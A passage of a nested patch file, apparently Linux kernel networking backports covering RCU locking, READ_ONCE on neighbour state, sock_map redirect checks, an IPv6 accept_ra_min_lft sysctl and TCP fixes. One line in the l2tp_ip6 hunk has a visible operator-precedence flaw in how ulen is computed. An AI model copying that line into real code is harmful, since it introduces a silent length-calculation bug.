+@@ -3389,13 +3391,13 @@ EXPORT_SYMBOL(neigh_seq_next);
+ 
+ void neigh_seq_stop(struct seq_file *seq, void *v)
+ 	__releases(tbl->lock)
+-	__releases(rcu_bh)
++	__releases(rcu)
+ {
+ 	struct neigh_seq_state *state = seq->private;
+ 	struct neigh_table *tbl = state->tbl;
+ 
+-	read_unlock(&tbl->lock);
+-	rcu_read_unlock_bh();
++	read_unlock_bh(&tbl->lock);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL(neigh_seq_stop);
+ 
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 96db7409baa12..38e01f82f2ef3 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -670,6 +670,8 @@ BPF_CALL_4(bpf_msg_redirect_map, struct sk_msg *, msg,
+ 	sk = __sock_map_lookup_elem(map, key);
+ 	if (unlikely(!sk || !sock_map_redirect_allowed(sk)))
+ 		return SK_DROP;
++	if (!(flags & BPF_F_INGRESS) && !sk_is_tcp(sk))
++		return SK_DROP;
+ 
+ 	msg->flags = flags;
+ 	msg->sk_redir = sk;
+@@ -1262,6 +1264,8 @@ BPF_CALL_4(bpf_msg_redirect_hash, struct sk_msg *, msg,
+ 	sk = __sock_hash_lookup_elem(map, key);
+ 	if (unlikely(!sk || !sock_map_redirect_allowed(sk)))
+ 		return SK_DROP;
++	if (!(flags & BPF_F_INGRESS) && !sk_is_tcp(sk))
++		return SK_DROP;
+ 
+ 	msg->flags = flags;
+ 	msg->sk_redir = sk;
+diff --git a/net/ipv4/arp.c b/net/ipv4/arp.c
+index 4f7237661afb9..9456f5bb35e5d 100644
+--- a/net/ipv4/arp.c
++++ b/net/ipv4/arp.c
+@@ -375,7 +375,7 @@ static void arp_solicit(struct neighbour *neigh, struct sk_buff *skb)
+ 
+ 	probes -= NEIGH_VAR(neigh->parms, UCAST_PROBES);
+ 	if (probes < 0) {
+-		if (!(neigh->nud_state & NUD_VALID))
++		if (!(READ_ONCE(neigh->nud_state) & NUD_VALID))
+ 			pr_debug("trying to ucast probe in NUD_INVALID\n");
+ 		neigh_ha_snapshot(dst_ha, neigh, dev);
+ 		dst_hw = dst_ha;
+@@ -1123,7 +1123,7 @@ static int arp_req_get(struct arpreq *r, struct net_device *dev)
+ 
+ 	neigh = neigh_lookup(&arp_tbl, &ip, dev);
+ 	if (neigh) {
+-		if (!(neigh->nud_state & NUD_NOARP)) {
++		if (!(READ_ONCE(neigh->nud_state) & NUD_NOARP)) {
+ 			read_lock_bh(&neigh->lock);
+ 			memcpy(r->arp_ha.sa_data, neigh->ha, dev->addr_len);
+ 			r->arp_flags = arp_state_to_flags(neigh);
+@@ -1144,12 +1144,12 @@ int arp_invalidate(struct net_device *dev, __be32 ip, bool force)
+ 	struct neigh_table *tbl = &arp_tbl;
+ 
+ 	if (neigh) {
+-		if ((neigh->nud_state & NUD_VALID) && !force) {
++		if ((READ_ONCE(neigh->nud_state) & NUD_VALID) && !force) {
+ 			neigh_release(neigh);
+ 			return 0;
+ 		}
+ 
+-		if (neigh->nud_state & ~NUD_NOARP)
++		if (READ_ONCE(neigh->nud_state) & ~NUD_NOARP)
+ 			err = neigh_update(neigh, NULL, NUD_FAILED,
+ 					   NEIGH_UPDATE_F_OVERRIDE|
+ 					   NEIGH_UPDATE_F_ADMIN, 0);
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 3b6e6bc80dc1c..eafa4a0335157 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -564,7 +564,7 @@ static int fib_detect_death(struct fib_info *fi, int order,
+ 		n = NULL;
+ 
+ 	if (n) {
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 		neigh_release(n);
+ 	} else {
+ 		return 0;
+@@ -2194,7 +2194,7 @@ static bool fib_good_nh(const struct fib_nh *nh)
+ 	if (nh->fib_nh_scope == RT_SCOPE_LINK) {
+ 		struct neighbour *n;
+ 
+-		rcu_read_lock_bh();
++		rcu_read_lock();
+ 
+ 		if (likely(nh->fib_nh_gw_family == AF_INET))
+ 			n = __ipv4_neigh_lookup_noref(nh->fib_nh_dev,
+@@ -2205,9 +2205,9 @@ static bool fib_good_nh(const struct fib_nh *nh)
+ 		else
+ 			n = NULL;
+ 		if (n)
+-			state = n->nud_state;
++			state = READ_ONCE(n->nud_state);
+ 
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 	}
+ 
+ 	return !!(state & NUD_VALID);
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 66908ce2dd116..493c679ea54f3 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -218,7 +218,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 			return res;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	neigh = ip_neigh_for_gw(rt, skb, &is_v6gw);
+ 	if (!IS_ERR(neigh)) {
+ 		int res;
+@@ -226,10 +226,10 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 		sock_confirm_neigh(skb, neigh);
+ 		/* if crossing protocols, can not use the cached header */
+ 		res = neigh_output(neigh, skb, is_v6gw);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return res;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	net_dbg_ratelimited("%s: No header cache and no neighbour!\n",
+ 			    __func__);
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index 9cc2879024541..be5498f5dd319 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -1124,13 +1124,13 @@ static bool ipv6_good_nh(const struct fib6_nh *nh)
+ 	int state = NUD_REACHABLE;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	n = __ipv6_neigh_lookup_noref_stub(nh->fib_nh_dev, &nh->fib_nh_gw6);
+ 	if (n)
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return !!(state & NUD_VALID);
+ }
+@@ -1140,14 +1140,14 @@ static bool ipv4_good_nh(const struct fib_nh *nh)
+ 	int state = NUD_REACHABLE;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	n = __ipv4_neigh_lookup_noref(nh->fib_nh_dev,
+ 				      (__force u32)nh->fib_nh_gw4);
+ 	if (n)
+-		state = n->nud_state;
++		state = READ_ONCE(n->nud_state);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return !!(state & NUD_VALID);
+ }
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 84a0a71a6f4e7..9cbaae4f5ee71 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -408,7 +408,7 @@ static struct neighbour *ipv4_neigh_lookup(const struct dst_entry *dst,
+ 	struct net_device *dev = dst->dev;
+ 	struct neighbour *n;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	if (likely(rt->rt_gw_family == AF_INET)) {
+ 		n = ip_neigh_gw4(dev, rt->rt_gw4);
+@@ -424,7 +424,7 @@ static struct neighbour *ipv4_neigh_lookup(const struct dst_entry *dst,
+ 	if (!IS_ERR(n) && !refcount_inc_not_zero(&n->refcnt))
+ 		n = NULL;
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return n;
+ }
+@@ -784,7 +784,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
+ 	if (!n)
+ 		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
+ 	if (!IS_ERR(n)) {
+-		if (!(n->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_VALID)) {
+ 			neigh_event_send(n, NULL);
+ 		} else {
+ 			if (fib_lookup(net, fl4, &res, 0) == 0) {
+@@ -3421,6 +3421,8 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 				    fa->fa_type == fri.type) {
+ 					fri.offload = READ_ONCE(fa->offload);
+ 					fri.trap = READ_ONCE(fa->trap);
++					fri.offload_failed =
++						READ_ONCE(fa->offload_failed);
+ 					break;
+ 				}
+ 			}
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index fab25d4f3a6f1..96fdde6e42b1b 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1755,16 +1755,13 @@ EXPORT_SYMBOL(tcp_read_sock);
+ 
+ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+-	struct tcp_sock *tp = tcp_sk(sk);
+-	u32 seq = tp->copied_seq;
+ 	struct sk_buff *skb;
+ 	int copied = 0;
+-	u32 offset;
+ 
+ 	if (sk->sk_state == TCP_LISTEN)
+ 		return -ENOTCONN;
+ 
+-	while ((skb = tcp_recv_skb(sk, seq, &offset)) != NULL) {
++	while ((skb = skb_peek(&sk->sk_receive_queue)) != NULL) {
+ 		u8 tcp_flags;
+ 		int used;
+ 
+@@ -1777,13 +1774,10 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 				copied = used;
+ 			break;
+ 		}
+-		seq += used;
+ 		copied += used;
+ 
+-		if (tcp_flags & TCPHDR_FIN) {
+-			++seq;
++		if (tcp_flags & TCPHDR_FIN)
+ 			break;
+-		}
+ 	}
+ 	return copied;
+ }
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 5f93918c063c7..f53380fd89bcf 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -217,6 +217,7 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 				  int *addr_len)
+ {
+ 	struct tcp_sock *tcp = tcp_sk(sk);
++	int peek = flags & MSG_PEEK;
+ 	u32 seq = tcp->copied_seq;
+ 	struct sk_psock *psock;
+ 	int copied = 0;
+@@ -306,7 +307,8 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ out:
+-	WRITE_ONCE(tcp->copied_seq, seq);
++	if (!peek)
++		WRITE_ONCE(tcp->copied_seq, seq);
+ 	tcp_rcv_space_adjust(sk);
+ 	if (copied > 0)
+ 		__tcp_cleanup_rbuf(sk, copied);
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index c697836f2b5b4..068221e742425 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -243,6 +243,19 @@ static void tcp_measure_rcv_mss(struct sock *sk, const struct sk_buff *skb)
+ 		if (unlikely(len > icsk->icsk_ack.rcv_mss +
+ 				   MAX_TCP_OPTION_SPACE))
+ 			tcp_gro_dev_warn(sk, skb, len);
++		/* If the skb has a len of exactly 1*MSS and has the PSH bit
++		 * set then it is likely the end of an application write. So
++		 * more data may not be arriving soon, and yet the data sender
++		 * may be waiting for an ACK if cwnd-bound or using TX zero
++		 * copy. So we set ICSK_ACK_PUSHED here so that
++		 * tcp_cleanup_rbuf() will send an ACK immediately if the app
++		 * reads all of the data and is not ping-pong. If len > MSS
++		 * then this logic does not matter (and does not hurt) because
++		 * tcp_cleanup_rbuf() will always ACK immediately if the app
++		 * reads data and there is more than an MSS of unACKed data.
++		 */
++		if (TCP_SKB_CB(skb)->tcp_flags & TCPHDR_PSH)
++			icsk->icsk_ack.pending |= ICSK_ACK_PUSHED;
+ 	} else {
+ 		/* Otherwise, we make more careful check taking into account,
+ 		 * that SACKs block is variable.
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index dc3166e56169f..5921b0f6f9f41 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -177,8 +177,7 @@ static void tcp_event_data_sent(struct tcp_sock *tp,
+ }
+ 
+ /* Account for an ACK we sent. */
+-static inline void tcp_event_ack_sent(struct sock *sk, unsigned int pkts,
+-				      u32 rcv_nxt)
++static inline void tcp_event_ack_sent(struct sock *sk, u32 rcv_nxt)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+@@ -192,7 +191,7 @@ static inline void tcp_event_ack_sent(struct sock *sk, unsigned int pkts,
+ 
+ 	if (unlikely(rcv_nxt != tp->rcv_nxt))
+ 		return;  /* Special ACK sent by DCTCP to reflect ECN */
+-	tcp_dec_quickack_mode(sk, pkts);
++	tcp_dec_quickack_mode(sk);
+ 	inet_csk_clear_xmit_timer(sk, ICSK_TIME_DACK);
+ }
+ 
+@@ -1373,7 +1372,7 @@ static int __tcp_transmit_skb(struct sock *sk, struct sk_buff *skb,
+ 			   sk, skb);
+ 
+ 	if (likely(tcb->tcp_flags & TCPHDR_ACK))
+-		tcp_event_ack_sent(sk, tcp_skb_pcount(skb), rcv_nxt);
++		tcp_event_ack_sent(sk, rcv_nxt);
+ 
+ 	if (skb->len != tcp_header_size) {
+ 		tcp_event_data_sent(tp, sk);
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 83be842198244..c63ccd39fc552 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -202,6 +202,7 @@ static struct ipv6_devconf ipv6_devconf __read_mostly = {
+ 	.ra_defrtr_metric	= IP6_RT_PRIO_USER,
+ 	.accept_ra_from_local	= 0,
+ 	.accept_ra_min_hop_limit= 1,
++	.accept_ra_min_lft	= 0,
+ 	.accept_ra_pinfo	= 1,
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	.accept_ra_rtr_pref	= 1,
+@@ -262,6 +263,7 @@ static struct ipv6_devconf ipv6_devconf_dflt __read_mostly = {
+ 	.ra_defrtr_metric	= IP6_RT_PRIO_USER,
+ 	.accept_ra_from_local	= 0,
+ 	.accept_ra_min_hop_limit= 1,
++	.accept_ra_min_lft	= 0,
+ 	.accept_ra_pinfo	= 1,
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	.accept_ra_rtr_pref	= 1,
+@@ -1033,7 +1035,7 @@ static int ipv6_add_addr_hash(struct net_device *dev, struct inet6_ifaddr *ifa)
+ 	unsigned int hash = inet6_addr_hash(net, &ifa->addr);
+ 	int err = 0;
+ 
+-	spin_lock(&net->ipv6.addrconf_hash_lock);
++	spin_lock_bh(&net->ipv6.addrconf_hash_lock);
+ 
+ 	/* Ignore adding duplicate addresses on an interface */
+ 	if (ipv6_chk_same_addr(net, &ifa->addr, dev, hash)) {
+@@ -1043,7 +1045,7 @@ static int ipv6_add_addr_hash(struct net_device *dev, struct inet6_ifaddr *ifa)
+ 		hlist_add_head_rcu(&ifa->addr_lst, &net->ipv6.inet6_addr_lst[hash]);
+ 	}
+ 
+-	spin_unlock(&net->ipv6.addrconf_hash_lock);
++	spin_unlock_bh(&net->ipv6.addrconf_hash_lock);
+ 
+ 	return err;
+ }
+@@ -1138,15 +1140,15 @@ ipv6_add_addr(struct inet6_dev *idev, struct ifa6_config *cfg,
+ 	/* For caller */
+ 	refcount_set(&ifa->refcnt, 1);
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	err = ipv6_add_addr_hash(idev->dev, ifa);
+ 	if (err < 0) {
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		goto out;
+ 	}
+ 
+-	write_lock(&idev->lock);
++	write_lock_bh(&idev->lock);
+ 
+ 	/* Add to inet6_dev unicast addr list. */
+ 	ipv6_link_dev_addr(idev, ifa);
+@@ -1157,9 +1159,9 @@ ipv6_add_addr(struct inet6_dev *idev, struct ifa6_config *cfg,
+ 	}
+ 
+ 	in6_ifa_hold(ifa);
+-	write_unlock(&idev->lock);
++	write_unlock_bh(&idev->lock);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	inet6addr_notifier_call_chain(NETDEV_UP, ifa);
+ out:
+@@ -2731,6 +2733,9 @@ void addrconf_prefix_rcv(struct net_device *dev, u8 *opt, int len, bool sllao)
+ 		return;
+ 	}
+ 
++	if (valid_lft != 0 && valid_lft < in6_dev->cnf.accept_ra_min_lft)
++		goto put;
++
+ 	/*
+ 	 *	Two things going on here:
+ 	 *	1) Add routes for on-link prefixes
+@@ -5601,6 +5606,7 @@ static inline void ipv6_store_devconf(struct ipv6_devconf *cnf,
+ 	array[DEVCONF_IOAM6_ID_WIDE] = cnf->ioam6_id_wide;
+ 	array[DEVCONF_NDISC_EVICT_NOCARRIER] = cnf->ndisc_evict_nocarrier;
+ 	array[DEVCONF_ACCEPT_UNTRACKED_NA] = cnf->accept_untracked_na;
++	array[DEVCONF_ACCEPT_RA_MIN_LFT] = cnf->accept_ra_min_lft;
+ }
+ 
+ static inline size_t inet6_ifla6_size(void)
+@@ -6794,6 +6800,13 @@ static const struct ctl_table addrconf_sysctl[] = {
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dointvec,
+ 	},
++	{
++		.procname	= "accept_ra_min_lft",
++		.data		= &ipv6_devconf.accept_ra_min_lft,
++		.maxlen		= sizeof(int),
++		.mode		= 0644,
++		.proc_handler	= proc_dointvec,
++	},
+ 	{
+ 		.procname	= "accept_ra_pinfo",
+ 		.data		= &ipv6_devconf.accept_ra_pinfo,
+diff --git a/net/ipv6/ip6_fib.c b/net/ipv6/ip6_fib.c
+index 413f66781e50d..eb6640f9a7921 100644
+--- a/net/ipv6/ip6_fib.c
++++ b/net/ipv6/ip6_fib.c
+@@ -2492,7 +2492,7 @@ static int ipv6_route_native_seq_show(struct seq_file *seq, void *v)
+ 	const struct net_device *dev;
+ 
+ 	if (rt->nh)
+-		fib6_nh = nexthop_fib6_nh_bh(rt->nh);
++		fib6_nh = nexthop_fib6_nh(rt->nh);
+ 
+ 	seq_printf(seq, "%pi6 %02x ", &rt->fib6_dst.addr, rt->fib6_dst.plen);
+ 
+@@ -2557,14 +2557,14 @@ static struct fib6_table *ipv6_route_seq_next_table(struct fib6_table *tbl,
+ 
+ 	if (tbl) {
+ 		h = (tbl->tb6_id & (FIB6_TABLE_HASHSZ - 1)) + 1;
+-		node = rcu_dereference_bh(hlist_next_rcu(&tbl->tb6_hlist));
++		node = rcu_dereference(hlist_next_rcu(&tbl->tb6_hlist));
+ 	} else {
+ 		h = 0;
+ 		node = NULL;
+ 	}
+ 
+ 	while (!node && h < FIB6_TABLE_HASHSZ) {
+-		node = rcu_dereference_bh(
++		node = rcu_dereference(
+ 			hlist_first_rcu(&net->ipv6.fib_table_hash[h++]));
+ 	}
+ 	return hlist_entry_safe(node, struct fib6_table, tb6_hlist);
+@@ -2594,7 +2594,7 @@ static void *ipv6_route_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 	if (!v)
+ 		goto iter_table;
+ 
+-	n = rcu_dereference_bh(((struct fib6_info *)v)->fib6_next);
++	n = rcu_dereference(((struct fib6_info *)v)->fib6_next);
+ 	if (n)
+ 		return n;
+ 
+@@ -2620,12 +2620,12 @@ iter_table:
+ }
+ 
+ static void *ipv6_route_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU_BH)
++	__acquires(RCU)
+ {
+ 	struct net *net = seq_file_net(seq);
+ 	struct ipv6_route_iter *iter = seq->private;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	iter->tbl = ipv6_route_seq_next_table(NULL, net);
+ 	iter->skip = *pos;
+ 
+@@ -2646,7 +2646,7 @@ static bool ipv6_route_iter_active(struct ipv6_route_iter *iter)
+ }
+ 
+ static void ipv6_route_native_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU_BH)
++	__releases(RCU)
+ {
+ 	struct net *net = seq_file_net(seq);
+ 	struct ipv6_route_iter *iter = seq->private;
+@@ -2654,7 +2654,7 @@ static void ipv6_route_native_seq_stop(struct seq_file *seq, void *v)
+ 	if (ipv6_route_iter_active(iter))
+ 		fib6_walker_unlink(net, &iter->w);
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ 
+ #if IS_BUILTIN(CONFIG_IPV6) && defined(CONFIG_BPF_SYSCALL)
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 34192f7a166fb..ce2c5e728745f 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -116,7 +116,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 			return res;
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	nexthop = rt6_nexthop((struct rt6_info *)dst, daddr);
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nexthop);
+ 
+@@ -124,7 +124,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 		if (unlikely(!neigh))
+ 			neigh = __neigh_create(&nd_tbl, nexthop, dev, false);
+ 		if (IS_ERR(neigh)) {
+-			rcu_read_unlock_bh();
++			rcu_read_unlock();
+ 			IP6_INC_STATS(net, idev, IPSTATS_MIB_OUTNOROUTES);
+ 			kfree_skb_reason(skb, SKB_DROP_REASON_NEIGH_CREATEFAIL);
+ 			return -EINVAL;
+@@ -132,7 +132,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 	}
+ 	sock_confirm_neigh(skb, neigh);
+ 	ret = neigh_output(neigh, skb, false);
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	return ret;
+ }
+ 
+@@ -1150,11 +1150,11 @@ static int ip6_dst_lookup_tail(struct net *net, const struct sock *sk,
+ 	 * dst entry of the nexthop router
+ 	 */
+ 	rt = (struct rt6_info *) *dst;
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	n = __ipv6_neigh_lookup_noref(rt->dst.dev,
+ 				      rt6_nexthop(rt, &fl6->daddr));
+-	err = n && !(n->nud_state & NUD_VALID) ? -EINVAL : 0;
+-	rcu_read_unlock_bh();
++	err = n && !(READ_ONCE(n->nud_state) & NUD_VALID) ? -EINVAL : 0;
++	rcu_read_unlock();
+ 
+ 	if (err) {
+ 		struct inet6_ifaddr *ifp;
+diff --git a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c
+index a4d43eb45a9de..8c5a99fe68030 100644
+--- a/net/ipv6/ndisc.c
++++ b/net/ipv6/ndisc.c
+@@ -746,7 +746,7 @@ static void ndisc_solicit(struct neighbour *neigh, struct sk_buff *skb)
+ 		saddr = &ipv6_hdr(skb)->saddr;
+ 	probes -= NEIGH_VAR(neigh->parms, UCAST_PROBES);
+ 	if (probes < 0) {
+-		if (!(neigh->nud_state & NUD_VALID)) {
++		if (!(READ_ONCE(neigh->nud_state) & NUD_VALID)) {
+ 			ND_PRINTK(1, dbg,
+ 				  "%s: trying to ucast probe in NUD_INVALID: %pI6\n",
+ 				  __func__, target);
+@@ -1092,7 +1092,7 @@ static void ndisc_recv_na(struct sk_buff *skb)
+ 		u8 old_flags = neigh->flags;
+ 		struct net *net = dev_net(dev);
+ 
+-		if (neigh->nud_state & NUD_FAILED)
++		if (READ_ONCE(neigh->nud_state) & NUD_FAILED)
+ 			goto out;
+ 
+ 		/*
+@@ -1331,6 +1331,14 @@ static void ndisc_router_discovery(struct sk_buff *skb)
+ 		goto skip_defrtr;
+ 	}
+ 
++	lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
++	if (lifetime != 0 && lifetime < in6_dev->cnf.accept_ra_min_lft) {
++		ND_PRINTK(2, info,
++			  "RA: router lifetime (%ds) is too short: %s\n",
++			  lifetime, skb->dev->name);
++		goto skip_defrtr;
++	}
++
+ 	/* Do not accept RA with source-addr found on local machine unless
+ 	 * accept_ra_from_local is set to true.
+ 	 */
+@@ -1343,8 +1351,6 @@ static void ndisc_router_discovery(struct sk_buff *skb)
+ 		goto skip_defrtr;
+ 	}
+ 
+-	lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime);
+-
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+ 	pref = ra_msg->icmph.icmp6_router_pref;
+ 	/* 10b is handled as if it were 00b (medium) */
+@@ -1519,6 +1525,9 @@ skip_linkparms:
+ 			if (ri->prefix_len == 0 &&
+ 			    !in6_dev->cnf.accept_ra_defrtr)
+ 				continue;
++			if (ri->lifetime != 0 &&
++			    ntohl(ri->lifetime) < in6_dev->cnf.accept_ra_min_lft)
++				continue;
+ 			if (ri->prefix_len < in6_dev->cnf.accept_ra_rt_info_min_plen)
+ 				continue;
+ 			if (ri->prefix_len > in6_dev->cnf.accept_ra_rt_info_max_plen)
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 93957b20fccce..0bcdb675ba2c1 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -636,15 +636,15 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 
+ 	nh_gw = &fib6_nh->fib_nh_gw6;
+ 	dev = fib6_nh->fib_nh_dev;
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	last_probe = READ_ONCE(fib6_nh->last_probe);
+ 	idev = __in6_dev_get(dev);
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nh_gw);
+ 	if (neigh) {
+-		if (neigh->nud_state & NUD_VALID)
++		if (READ_ONCE(neigh->nud_state) & NUD_VALID)
+ 			goto out;
+ 
+-		write_lock(&neigh->lock);
++		write_lock_bh(&neigh->lock);
+ 		if (!(neigh->nud_state & NUD_VALID) &&
+ 		    time_after(jiffies,
+ 			       neigh->updated + idev->cnf.rtr_probe_interval)) {
+@@ -652,7 +652,7 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 			if (work)
+ 				__neigh_set_probe_once(neigh);
+ 		}
+-		write_unlock(&neigh->lock);
++		write_unlock_bh(&neigh->lock);
+ 	} else if (time_after(jiffies, last_probe +
+ 				       idev->cnf.rtr_probe_interval)) {
+ 		work = kmalloc(sizeof(*work), GFP_ATOMIC);
+@@ -670,7 +670,7 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 	}
+ 
+ out:
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ }
+ #else
+ static inline void rt6_probe(struct fib6_nh *fib6_nh)
+@@ -686,25 +686,25 @@ static enum rt6_nud_state rt6_check_neigh(const struct fib6_nh *fib6_nh)
+ 	enum rt6_nud_state ret = RT6_NUD_FAIL_HARD;
+ 	struct neighbour *neigh;
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	neigh = __ipv6_neigh_lookup_noref(fib6_nh->fib_nh_dev,
+ 					  &fib6_nh->fib_nh_gw6);
+ 	if (neigh) {
+-		read_lock(&neigh->lock);
+-		if (neigh->nud_state & NUD_VALID)
++		u8 nud_state = READ_ONCE(neigh->nud_state);
++
++		if (nud_state & NUD_VALID)
+ 			ret = RT6_NUD_SUCCEED;
+ #ifdef CONFIG_IPV6_ROUTER_PREF
+-		else if (!(neigh->nud_state & NUD_FAILED))
++		else if (!(nud_state & NUD_FAILED))
+ 			ret = RT6_NUD_SUCCEED;
+ 		else
+ 			ret = RT6_NUD_FAIL_PROBE;
+ #endif
+-		read_unlock(&neigh->lock);
+ 	} else {
+ 		ret = IS_ENABLED(CONFIG_IPV6_ROUTER_PREF) ?
+ 		      RT6_NUD_SUCCEED : RT6_NUD_FAIL_DO_RR;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	return ret;
+ }
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 4bdd356bb5c46..7be89dcfd5fc5 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1644,9 +1644,12 @@ process:
+ 		struct sock *nsk;
+ 
+ 		sk = req->rsk_listener;
+-		drop_reason = tcp_inbound_md5_hash(sk, skb,
+-						   &hdr->saddr, &hdr->daddr,
+-						   AF_INET6, dif, sdif);
++		if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
++			drop_reason = SKB_DROP_REASON_XFRM_POLICY;
++		else
++			drop_reason = tcp_inbound_md5_hash(sk, skb,
++							   &hdr->saddr, &hdr->daddr,
++							   AF_INET6, dif, sdif);
+ 		if (drop_reason) {
+ 			sk_drops_add(sk, skb);
+ 			reqsk_put(req);
+@@ -1693,6 +1696,7 @@ process:
+ 			}
+ 			goto discard_and_relse;
+ 		}
++		nf_reset_ct(skb);
+ 		if (nsk == sk) {
+ 			reqsk_put(req);
+ 			tcp_v6_restore_cb(skb);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index bce4132b0a5c8..314ec3a51e8de 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -510,7 +510,6 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	 */
+ 	if (len > INT_MAX - transhdrlen)
+ 		return -EMSGSIZE;
+-	ulen = len + transhdrlen;
+ 
+ 	/* Mirror BSD error message compatibility */
+ 	if (msg->msg_flags & MSG_OOB)
+@@ -631,6 +630,7 @@ static int l2tp_ip6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ back_from_confirm:
+ 	lock_sock(sk);
++	ulen = len + skb_queue_empty(&sk->sk_write_queue) ? transhdrlen : 0;
+ 	err = ip6_append_data(sk, ip_generic_getfrag, msg,
+ 			      ulen, transhdrlen, &ipc6,
+ 			      &fl6, (struct rt6_info *)dst,
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
